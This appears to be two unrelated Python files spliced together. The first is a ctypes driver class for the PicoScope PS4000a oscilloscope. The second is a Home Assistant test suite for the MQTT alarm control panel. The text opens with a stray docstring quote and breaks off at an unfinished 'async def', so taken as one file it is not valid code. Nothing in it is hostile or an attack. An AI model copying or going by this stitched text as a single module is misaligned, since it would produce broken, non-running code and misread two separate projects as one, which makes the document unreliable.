""" from __future__ import division from __future__ import absolute_import from __future__ import print_function from __future__ import unicode_literals import string import inspect # to load the proper dll import platform # Do not import or use ill definied data types # such as short int or long # use the values specified in the h file # float is always defined as 32 bits # double is defined as 64 bits from ctypes import byref, POINTER, create_string_buffer, c_float, \ c_int16, c_int32, c_uint32, c_void_p, c_int8, c_double from ctypes import c_int32 as c_enum from picoscope.picobase import _PicoscopeBase class PS4000a(_PicoscopeBase): """The following are low-level functions for the PS4000a""" LIBNAME = "ps4000a" NUM_CHANNELS = 8 CHANNELS = dict(zip(string.ascii_uppercase[0:NUM_CHANNELS], range(NUM_CHANNELS))) CHANNEL_RANGE = [ {"rangeV": 10E-3, "apivalue": 0, "rangeStr": "10 mV"}, {"rangeV": 20E-3, "apivalue": 1, "rangeStr": "20 mV"}, {"rangeV": 50E-3, "apivalue": 2, "rangeStr": "50 mV"}, {"rangeV": 100E-3, "apivalue": 3, "rangeStr": "100 mV"}, {"rangeV": 200E-3, "apivalue": 4, "rangeStr": "200 mV"}, {"rangeV": 500E-3, "apivalue": 5, "rangeStr": "500 mV"}, {"rangeV": 1.0, "apivalue": 6, "rangeStr": "1 V"}, {"rangeV": 2.0, "apivalue": 7, "rangeStr": "2 V"}, {"rangeV": 5.0, "apivalue": 8, "rangeStr": "5 V"}, {"rangeV": 10.0, "apivalue": 9, "rangeStr": "10 V"}, {"rangeV": 20.0, "apivalue": 10, "rangeStr": "20 V"}, {"rangeV": 50.0, "apivalue": 11, "rangeStr": "50 V"}, {"rangeV": 100.0, "apivalue": 12, "rangeStr": "100 V"}, {"rangeV": 200.0, "apivalue": 13, "rangeStr": "200 V"} ] ERROR_CODES = [[0x00, "PICO_OK", "The PicoScope XXXX is functioning correctly."], [0x01, "PICO_MAX_UNITS_OPENED", "An attempt has been made to open more than PS3000_MAX_UNITS."], [0x02, "PICO_MEMORY_FAIL", "Not enough memory could be allocated on the host machine."], [0x03, "PICO_NOT_FOUND", "No PicoScope XXXX could be found."], [0x04, "PICO_FW_FAIL", "Unable to download firmware."], [0x05, "PICO_OPEN_OPERATION_IN_PROGRESS", "?"], [0x06, "PICO_OPERATION_FAILED", "?"], [0x07, "PICO_NOT_RESPONDING", "The PicoScope XXXX is not responding to commands from the PC."], [0x08, "PICO_CONFIG_FAIL", "The configuration info has become corrupt or is missing"], [0x09, "PICO_KERNEL_DRIVER_TOO_OLD", "?"], [0x0A, "PICO_EEPROM_CORRUPT", "?"], [0x0B, "PICO_OS_NOT_SUPPORTED", "The OS is not supported"], [0x0C, "PICO_INVALID_HANDLE", "?"], [0x0D, "PICO_INVALID_PARAMETER", "?"], [0x0E, "PICO_INVALID_TIMEBASE", "?"], [0x0F, "PICO_INVALID_VOLTAGE", "?"] ] MY_ERROR_CODES = { "PICO_OK": 0x00, "PICO_USB_3_0_DEVICE_NON_USB3_0_PORT": 0x11E } CHANNEL_COUPLINGS = {"AC": 0, "DC": 1} has_sig_gen = True WAVE_TYPES = {"Sine": 0, "Square": 1, "Triangle": 2, "RampUp": 3, "RampDown": 4, "Sinc": 5, "Gaussian": 6, "HalfSine": 7, "DCVoltage": 8, "WhiteNoise": 9} SIGGEN_TRIGGER_TYPES = {"Rising": 0, "Falling": 1, "GateHigh": 2, "GateLow": 3} SIGGEN_TRIGGER_SOURCES = {"None": 0, "ScopeTrig": 1, "AuxIn": 2, "ExtIn": 3, "SoftTrig": 4, "TriggerRaw": 5} AWGPhaseAccumulatorSize = 32 AWGBufferAddressWidth = 14 AWGMaxSamples = 2 ** AWGBufferAddressWidth AWGDACInterval = 12.5E-9 # in seconds AWGDACFrequency = 1 / AWGDACInterval # Note this is NOT what is written in the Programming guide as of version # 10_5_0_28 # This issue was acknowledged in this thread # http://www.picotech.com/support/topic13217.html AWGMaxVal = 0x0FFF AWGMinVal = 0x0000 AWG_INDEX_MODES = {"Single": 0, "Dual": 1, "Quad": 2} TIME_UNITS = {"FS": 0, "PS": 1, "NS": 2, "US": 3, "MS": 4, "S": 5} 
MAX_VALUE = 32767 MIN_VALUE = -32767 MAX_TIMEBASES = 2**32-1 # variable depending on model UNIT_INFO_TYPES = {"DriverVersion" : 0x0, "USBVersion" : 0x1, "HardwareVersion" : 0x2, "VarianInfo" : 0x3, "BatchAndSerial" : 0x4, "CalDate" : 0x5, # "ErrorCode" : 0x6, "KernelVersion" : 0x6} channelBuffersPtr = [c_void_p()]*NUM_CHANNELS channelBuffersLen = [0]*NUM_CHANNELS def __init__(self, serialNumber=None, connect=True): """Load DLL etc""" if platform.system() == 'Linux': from ctypes import cdll self.lib = cdll.LoadLibrary("lib" + self.LIBNAME + ".so") else: from ctypes import windll self.lib = windll.LoadLibrary(self.LIBNAME + ".dll") super(PS4000a, self).__init__(serialNumber, connect) def _lowLevelOpenUnit(self, sn): c_handle = c_int16() c_serial = c_int8() if sn: m = self.lib.ps4000aOpenUnit(byref(c_handle), byref(sn)) else: m = self.lib.ps4000aOpenUnit(byref(c_handle), None) if c_handle.value > 0: self.handle = c_handle.value if (m == self.MY_ERROR_CODES["PICO_USB_3_0_DEVICE_NON_USB3_0_PORT"]): m = self.lib.ps4000aChangePowerSource(c_handle, c_uint32(m)) if m < 0: raise IOError("Failed to Find PS4000a Unit.") self.suggested_time_units = self.TIME_UNITS["NS"] def _lowLevelCloseUnit(self): m = self.lib.ps4000aCloseUnit(c_int16(self.handle)) self.checkResult(m) def _lowLevelSetChannel(self, chNum, enabled, coupling, VRange, VOffset, BWLimited): if abs(VOffset) > 0.: maxOffset = c_float(); minOffset = c_float() m = self.lib.ps4000aGetAnalogueOffset(c_int16(self.handle), c_enum(VRange), c_enum(coupling), byref(maxOffset), byref(minOffset)) self.checkResult(m) if VOffset > maxOffset.value or VOffset < minOffset.value: raise ValueError('PS4000a setChannel: invalid offset %f V'%VOffset) m = self.lib.ps4000aSetChannel(c_int16(self.handle), c_enum(chNum), c_int16(enabled), c_enum(coupling), c_enum(VRange), c_float(VOffset)) self.checkResult(m) def _lowLevelSetSimpleTrigger(self, enabled, trigsrc, threshold_adc, direction, timeout_ms, auto): m = self.lib.ps4000aSetSimpleTrigger( c_int16(self.handle), c_int16(enabled), c_enum(trigsrc), c_int16(threshold_adc), c_enum(direction), c_uint32(timeout_ms), c_int16(auto)) self.checkResult(m) def _lowLevelStop(self): m = self.lib.ps4000aStop(c_int16(self.handle)) self.checkResult(m) def _lowLevelRunBlock(self, numPreTrigSamples, numPostTrigSamples, timebase, oversample, segmentIndex): #TODO: Fix 'delay' which is where trigger occurs in block #TODO: Add callbacks timeIndisposedMs = c_int32() m = self.lib.ps4000aRunBlock( c_int16(self.handle), c_int32(numPreTrigSamples), c_int32(numPostTrigSamples),c_uint32(timebase),byref(timeIndisposedMs),c_uint32(segmentIndex),None,None) if not m==0: raise IOError('Error calling %s: parameter out of range'%(inspect.stack()[1][3])) return timeIndisposedMs.value def _lowLevelGetUnitInfo(self, info): s = create_string_buffer(256) requiredSize = c_int16(0) m = self.lib.ps4000aGetUnitInfo(c_int16(self.handle), byref(s), c_int16(len(s)), byref(requiredSize), c_enum(info)) self.checkResult(m) if requiredSize.value > len(s): s = create_string_buffer(requiredSize.value + 1) m = self.lib.ps4000aGetUnitInfo(c_int16(self.handle), byref(s), c_int16(len(s)), byref(requiredSize), c_enum(info)) self.checkResult(m) # should this be ascii instead? # I think they are equivalent... 
        return s.value.decode('utf-8')

    def _lowLevelFlashLed(self, times):
        m = self.lib.ps4000aFlashLed(c_int16(self.handle), c_int16(times))
        self.checkHandleResult(m)

    def checkHandleResult(self, ec):
        if not ec == 0:
            raise IOError('Error calling %s: invalid handle given' % (inspect.stack()[1][3]))

    def checkResult(self, ec):
        if not ec == 0:
            raise IOError('Error calling %s: error code 0x%X' % (inspect.stack()[1][3], ec))

    def _lowLevelEnumerateUnits(self):
        count = c_int16(0)
        m = self.lib.ps4000aEnumerateUnits(byref(count), None, None)
        self.checkResult(m)
        # a serial number is roughly 8 characters
        # an extra character for the comma
        # and an extra one for the space after the comma?
        # the extra two also work for the null termination
        serialLth = c_int16(count.value * (8 + 2))
        serials = create_string_buffer(serialLth.value + 1)

        m = self.lib.ps4000aEnumerateUnits(byref(count), serials, byref(serialLth))
        self.checkResult(m)

        serialList = str(serials.value.decode('utf-8')).split(',')
        serialList = [x.strip() for x in serialList]
        return serialList

    def getTimeBaseNum(self, sampleTimeS):
        """Return the timebase index for the requested sample interval (in seconds).

        Returns None if the interval maps outside the device's timebase range.
        """
        time_interval = c_int32()
        max_samples = c_int32()
        tb = int(sampleTimeS / 12.5e-9) - 1
        if tb > 0 and tb < self.MAX_TIMEBASES:
            rv = self.lib.ps4000aGetTimebase(c_int16(self.handle), c_uint32(tb),
                                             c_int32(512), byref(time_interval),
                                             byref(max_samples), c_uint32(0))
            if rv == 0:
                return tb
            else:
                self.checkResult(rv)

    def getTimestepFromTimebase(self, timebase):
        time_interval = c_int32()
        m = self.lib.ps4000aGetTimebase(c_int16(self.handle), c_uint32(timebase),
                                        c_int32(512), byref(time_interval),
                                        c_void_p(), c_uint32(0))
        if not m == 0:
            raise IOError('Error calling %s: invalid parameters given' % (inspect.stack()[1][3]))
        return (time_interval.value / 1.0E9)

    def _lowLevelGetTimebase(self, tb, noSamples, oversample, segmentIndex):
        """
        return (timeIntervalSeconds, maxSamples).
""" maxSamples = c_int32() interval = c_int32() time_units = c_int16() m = self.lib.ps4000aGetTimebase(c_int16(self.handle), c_uint32(tb), c_int32(noSamples), byref(interval), byref(maxSamples), c_uint32(0)) if not m==0: raise IOError('Error calling %s: invalid parameters given'%(inspect.stack()[1][3])) return (interval.value/1e9, maxSamples.value) def _lowLevelIsReady(self): ready = c_int16() self.lib.ps4000aIsReady(c_int16(self.handle),byref(ready)) if not ready.value == 0: return True else: return False def _lowLevelGetValues(self, numSamples, startIndex, downSampleRatio, downSampleMode, segmentIndex): #TODO: Check overflow in channelBuffersLen against numSamples, but need to # not raise error if channelBuffersPtr is void overflow = c_int16() numSamples = c_uint32(numSamples) m = self.lib.ps4000aGetValues( c_int16(self.handle), c_uint32(startIndex), byref(numSamples), c_uint32(downSampleRatio), #downsample factor c_enum(downSampleMode), c_uint32(segmentIndex), byref(overflow)) if m == 0: return (numSamples.value, overflow.value) else: self.checkResult(m) def _lowLevelSetDataBuffer(self, channel, data, downSampleMode, segmentIndex): dataPtr = data.ctypes.data_as(POINTER(c_int16)) numSamples = len(data) self.channelBuffersPtr[channel] = dataPtr self.channelBuffersLen[channel] = numSamples m = self.lib.ps4000aSetDataBuffer(c_int16(self.handle),c_enum(channel),self.channelBuffersPtr[channel],c_int32(numSamples),c_uint32(segmentIndex),c_enum(downSampleMode)) self.checkResult(m) def _lowLevelClearDataBuffer(self, channel, segmentIndex): m = self.lib.ps4000aSetDataBuffer(c_int16(self.handle), c_enum(channel), c_void_p(), c_int32(0), c_uint32(segmentIndex), c_enum(0)) self.checkResult(m) def _lowLevelSetSigGenBuiltInSimple(self, offsetVoltage, pkToPk, waveType, frequency, shots, triggerType, triggerSource): m = self.lib.ps4000aSetSigGenBuiltIn( c_int16(self.handle), c_int32(int(offsetVoltage * 1000000)), c_uint32(int(pkToPk * 1000000)), c_enum(waveType), c_double(frequency), c_double(frequency), c_double(0), c_double(0), c_enum(0), c_enum(0), c_uint32(shots), c_uint32(0), c_enum(triggerType), c_enum(triggerSource), c_int16(0)) self.checkResult(m) def setWhiteNoise(self,pkToPk): offsetVoltage = 0. m = self.lib.ps4000aSetSigGenBuiltIn( c_int16(self.handle), c_int32(int(0 * 1000000)), c_uint32(int(pkToPk * 1000000)), c_enum(0), #for white noise c_double(1000.), c_double(1000.), c_double(0), c_double(.1), c_enum(0), c_enum(1), c_uint32(0), c_uint32(0), c_enum(0), c_enum(0), #trigger type and source c_int16(0)) self.checkResult(m) def _lowLevelSetAWGSimpleDeltaPhase(self, waveform, deltaPhase, offsetVoltage, pkToPk, indexMode, shots, triggerType, triggerSource): """ waveform should be an array of shorts """ waveformPtr = waveform.ctypes.data_as(POINTER(c_int16)) m = self.lib.ps4000aSetSigGenArbitrary( c_int16(self.handle), c_int32(int(offsetVoltage * 1E6)), # offset voltage in microvolts c_uint32(int(pkToPk * 1E6)), # pkToPk in microvolts c_uint32(int(deltaPhase)), # startDeltaPhase c_uint32(int(deltaPhase)), # stopDeltaPhase c_uint32(0), # deltaPhaseIncrement c_uint32(0), # dwellCount waveformPtr, # arbitraryWaveform c_int32(len(waveform)), # arbitraryWaveformSize c_enum(0), # sweepType for deltaPhase c_enum(0), # operation (adding random noise and whatnot) c_enum(indexMode), # single, dual, quad c_uint32(shots), c_uint32(0), # sweeps c_uint32(triggerType), c_uint32(triggerSource), c_int16(0)) # extInThreshold self.checkResult(m)
"""The tests the MQTT alarm control panel component.""" import copy import json from unittest.mock import patch import pytest from homeassistant.components import alarm_control_panel from homeassistant.const import ( STATE_ALARM_ARMED_AWAY, STATE_ALARM_ARMED_CUSTOM_BYPASS, STATE_ALARM_ARMED_HOME, STATE_ALARM_ARMED_NIGHT, STATE_ALARM_ARMING, STATE_ALARM_DISARMED, STATE_ALARM_DISARMING, STATE_ALARM_PENDING, STATE_ALARM_TRIGGERED, STATE_UNKNOWN, ) from homeassistant.setup import async_setup_component from .test_common import ( help_test_availability_when_connection_lost, help_test_availability_without_topic, help_test_custom_availability_payload, help_test_default_availability_payload, help_test_discovery_broken, help_test_discovery_removal, help_test_discovery_update, help_test_discovery_update_attr, help_test_discovery_update_unchanged, help_test_entity_debug_info_message, help_test_entity_device_info_remove, help_test_entity_device_info_update, help_test_entity_device_info_with_connection, help_test_entity_device_info_with_identifier, help_test_entity_id_update_discovery_update, help_test_entity_id_update_subscriptions, help_test_setting_attribute_via_mqtt_json_message, help_test_setting_attribute_with_template, help_test_unique_id, help_test_update_with_json_attrs_bad_JSON, help_test_update_with_json_attrs_not_dict, ) from tests.common import assert_setup_component, async_fire_mqtt_message from tests.components.alarm_control_panel import common CODE_NUMBER = "1234" CODE_TEXT = "HELLO_CODE" DEFAULT_CONFIG = { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", } } DEFAULT_CONFIG_CODE = { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", "code": "0123", "code_arm_required": True, } } async def test_fail_setup_without_state_topic(hass, mqtt_mock): """Test for failing with no state topic.""" with assert_setup_component(0) as config: assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "command_topic": "alarm/command", } }, ) assert not config[alarm_control_panel.DOMAIN] async def test_fail_setup_without_command_topic(hass, mqtt_mock): """Test failing with no command topic.""" with assert_setup_component(0): assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "state_topic": "alarm/state", } }, ) async def test_update_state_via_state_topic(hass, mqtt_mock): """Test updating with via state topic.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() entity_id = "alarm_control_panel.test" assert hass.states.get(entity_id).state == STATE_UNKNOWN for state in ( STATE_ALARM_DISARMED, STATE_ALARM_ARMED_HOME, STATE_ALARM_ARMED_AWAY, STATE_ALARM_ARMED_NIGHT, STATE_ALARM_ARMED_CUSTOM_BYPASS, STATE_ALARM_PENDING, STATE_ALARM_ARMING, STATE_ALARM_DISARMING, STATE_ALARM_TRIGGERED, ): async_fire_mqtt_message(hass, "alarm/state", state) assert hass.states.get(entity_id).state == state async def test_ignore_update_state_if_unknown_via_state_topic(hass, mqtt_mock): """Test ignoring updates via state topic.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() entity_id = "alarm_control_panel.test" assert hass.states.get(entity_id).state == STATE_UNKNOWN 
async_fire_mqtt_message(hass, "alarm/state", "unsupported state") assert hass.states.get(entity_id).state == STATE_UNKNOWN async def test_arm_home_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while armed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() await common.async_alarm_arm_home(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_HOME", 0, False ) async def test_arm_home_not_publishes_mqtt_with_invalid_code_when_req(hass, mqtt_mock): """Test not publishing of MQTT messages with invalid. When code_arm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE, ) call_count = mqtt_mock.async_publish.call_count await common.async_alarm_arm_home(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_arm_home_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages. When code_arm_required = False """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code_arm_required"] = False assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_arm_home(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_HOME", 0, False ) async def test_arm_away_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while armed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() await common.async_alarm_arm_away(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_AWAY", 0, False ) async def test_arm_away_not_publishes_mqtt_with_invalid_code_when_req(hass, mqtt_mock): """Test not publishing of MQTT messages with invalid code. When code_arm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE, ) call_count = mqtt_mock.async_publish.call_count await common.async_alarm_arm_away(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_arm_away_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages. When code_arm_required = False """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code_arm_required"] = False assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_arm_away(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_AWAY", 0, False ) async def test_arm_night_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while armed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() await common.async_alarm_arm_night(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_NIGHT", 0, False ) async def test_arm_night_not_publishes_mqtt_with_invalid_code_when_req(hass, mqtt_mock): """Test not publishing of MQTT messages with invalid code. 
When code_arm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE, ) call_count = mqtt_mock.async_publish.call_count await common.async_alarm_arm_night(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_arm_night_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages. When code_arm_required = False """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code_arm_required"] = False assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_arm_night(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_NIGHT", 0, False ) async def test_arm_custom_bypass_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while armed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", } }, ) await hass.async_block_till_done() await common.async_alarm_arm_custom_bypass(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_CUSTOM_BYPASS", 0, False ) async def test_arm_custom_bypass_not_publishes_mqtt_with_invalid_code_when_req( hass, mqtt_mock ): """Test not publishing of MQTT messages with invalid code. When code_arm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", "code": "1234", "code_arm_required": True, } }, ) await hass.async_block_till_done() call_count = mqtt_mock.async_publish.call_count await common.async_alarm_arm_custom_bypass(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_arm_custom_bypass_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages. When code_arm_required = False """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", "code": "1234", "code_arm_required": False, } }, ) await hass.async_block_till_done() await common.async_alarm_arm_custom_bypass(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_CUSTOM_BYPASS", 0, False ) async def test_disarm_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while disarmed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() await common.async_alarm_disarm(hass) mqtt_mock.async_publish.assert_called_once_with("alarm/command", "DISARM", 0, False) async def test_disarm_publishes_mqtt_with_template(hass, mqtt_mock): """Test publishing of MQTT messages while disarmed. 
When command_template set to output json """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code"] = "0123" config[alarm_control_panel.DOMAIN][ "command_template" ] = '{"action":"{{ action }}","code":"{{ code }}"}' assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_disarm(hass, "0123") mqtt_mock.async_publish.assert_called_once_with( "alarm/command", '{"action":"DISARM","code":"0123"}', 0, False ) async def test_disarm_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages while disarmed. When code_disarm_required = False """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code"] = "1234" config[alarm_control_panel.DOMAIN]["code_disarm_required"] = False assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_disarm(hass) mqtt_mock.async_publish.assert_called_once_with("alarm/command", "DISARM", 0, False) async def test_disarm_not_publishes_mqtt_with_invalid_code_when_req(hass, mqtt_mock): """Test not publishing of MQTT messages with invalid code. When code_disarm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE, ) call_count = mqtt_mock.async_publish.call_count await common.async_alarm_disarm(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_update_state_via_state_topic_template(hass, mqtt_mock): """Test updating with template_value via state topic.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "command_topic": "test-topic", "state_topic": "test-topic", "value_template": "\ {% if (value | int) == 100 %}\ armed_away\ {% else %}\ disarmed\ {% endif %}", } }, ) await hass.async_block_till_done() state = hass.states.get("alarm_control_panel.test") assert state.state == STATE_UNKNOWN async_fire_mqtt_message(hass, "test-topic", "100") state = hass.states.get("alarm_control_panel.test") assert state.state == STATE_ALARM_ARMED_AWAY async def test_attributes_code_number(hass, mqtt_mock): """Test attributes which are not supported by the vacuum.""" config = copy.deepcopy(DEFAULT_CONFIG) config[alarm_control_panel.DOMAIN]["code"] = CODE_NUMBER assert await async_setup_component(hass, alarm_control_panel.DOMAIN, config) await hass.async_block_till_done() state = hass.states.get("alarm_control_panel.test") assert ( state.attributes.get(alarm_control_panel.ATTR_CODE_FORMAT) == alarm_control_panel.FORMAT_NUMBER ) async def test_attributes_code_text(hass, mqtt_mock): """Test attributes which are not supported by the vacuum.""" config = copy.deepcopy(DEFAULT_CONFIG) config[alarm_control_panel.DOMAIN]["code"] = CODE_TEXT assert await async_setup_component(hass, alarm_control_panel.DOMAIN, config) await hass.async_block_till_done() state = hass.states.get("alarm_control_panel.test") assert ( state.attributes.get(alarm_control_panel.ATTR_CODE_FORMAT) == alarm_control_panel.FORMAT_TEXT ) async def test_availability_when_connection_lost(hass, mqtt_mock): """Test availability after MQTT disconnection.""" await help_test_availability_when_connection_lost( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE ) async def test_availability_without_topic(hass, mqtt_mock): """Test availability without defined availability topic.""" await 
help_test_availability_without_topic( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE ) async def test_default_availability_payload(hass, mqtt_mock): """Test availability by default payload with defined topic.""" await help_test_default_availability_payload( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE ) async def test_custom_availability_payload(hass, mqtt_mock): """Test availability by custom payload with defined topic.""" await help_test_custom_availability_payload( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE ) async def test_setting_attribute_via_mqtt_json_message(hass, mqtt_mock): """Test the setting of attribute via MQTT with JSON payload.""" await help_test_setting_attribute_via_mqtt_json_message( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_setting_attribute_with_template(hass, mqtt_mock): """Test the setting of attribute via MQTT with JSON payload.""" await help_test_setting_attribute_with_template( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_update_with_json_attrs_not_dict(hass, mqtt_mock, caplog): """Test attributes get extracted from a JSON result.""" await help_test_update_with_json_attrs_not_dict( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_update_with_json_attrs_bad_JSON(hass, mqtt_mock, caplog): """Test attributes get extracted from a JSON result.""" await help_test_update_with_json_attrs_bad_JSON( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_discovery_update_attr(hass, mqtt_mock, caplog): """Test update of discovered MQTTAttributes.""" await help_test_discovery_update_attr( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_unique_id(hass, mqtt_mock): """Test unique id option only creates one alarm per unique_id.""" config = { alarm_control_panel.DOMAIN: [ { "platform": "mqtt", "name": "Test 1", "state_topic": "test-topic", "command_topic": "command-topic", "unique_id": "TOTALLY_UNIQUE", }, { "platform": "mqtt", "name": "Test 2", "state_topic": "test-topic", "command_topic": "command-topic", "unique_id": "TOTALLY_UNIQUE", }, ] } await help_test_unique_id(hass, mqtt_mock, alarm_control_panel.DOMAIN, config) async def test_discovery_removal_alarm(hass, mqtt_mock, caplog): """Test removal of discovered alarm_control_panel.""" data = json.dumps(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) await help_test_discovery_removal( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data ) async def test_discovery_update_alarm_topic_and_template(hass, mqtt_mock, caplog): """Test update of discovered alarm_control_panel.""" config1 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config2 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config1["name"] = "Beer" config2["name"] = "Milk" config1["state_topic"] = "alarm/state1" config2["state_topic"] = "alarm/state2" config1["value_template"] = "{{ value_json.state1.state }}" config2["value_template"] = "{{ value_json.state2.state }}" state_data1 = [ ([("alarm/state1", '{"state1":{"state":"armed_away"}}')], "armed_away", None), ] state_data2 = [ ([("alarm/state1", '{"state1":{"state":"triggered"}}')], "armed_away", None), ([("alarm/state1", '{"state2":{"state":"triggered"}}')], "armed_away", None), ([("alarm/state2", '{"state1":{"state":"triggered"}}')], "armed_away", None), ([("alarm/state2", '{"state2":{"state":"triggered"}}')], "triggered", None), ] data1 = json.dumps(config1) data2 
= json.dumps(config2) await help_test_discovery_update( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data1, data2, state_data1=state_data1, state_data2=state_data2, ) async def test_discovery_update_alarm_template(hass, mqtt_mock, caplog): """Test update of discovered alarm_control_panel.""" config1 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config2 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config1["name"] = "Beer" config2["name"] = "Milk" config1["state_topic"] = "alarm/state1" config2["state_topic"] = "alarm/state1" config1["value_template"] = "{{ value_json.state1.state }}" config2["value_template"] = "{{ value_json.state2.state }}" state_data1 = [ ([("alarm/state1", '{"state1":{"state":"armed_away"}}')], "armed_away", None), ] state_data2 = [ ([("alarm/state1", '{"state1":{"state":"triggered"}}')], "armed_away", None), ([("alarm/state1", '{"state2":{"state":"triggered"}}')], "triggered", None), ] data1 = json.dumps(config1) data2 = json.dumps(config2) await help_test_discovery_update( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data1, data2, state_data1=state_data1, state_data2=state_data2, ) async def test_discovery_update_unchanged_alarm(hass, mqtt_mock, caplog): """Test update of discovered alarm_control_panel.""" config1 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config1["name"] = "Beer" data1 = json.dumps(config1) with patch( "homeassistant.components.mqtt.alarm_control_panel.MqttAlarm.discovery_update" ) as discovery_update: await help_test_discovery_update_unchanged( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data1, discovery_update ) @pytest.mark.no_fail_on_log_exception async def test_discovery_broken(hass, mqtt_mock, caplog): """Test handling of bad discovery message.""" data1 = '{ "name": "Beer" }' data2 = ( '{ "name": "Milk",' ' "state_topic": "test_topic",' ' "command_topic": "test_topic" }' ) await help_test_discovery_broken( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data1, data2 ) async def 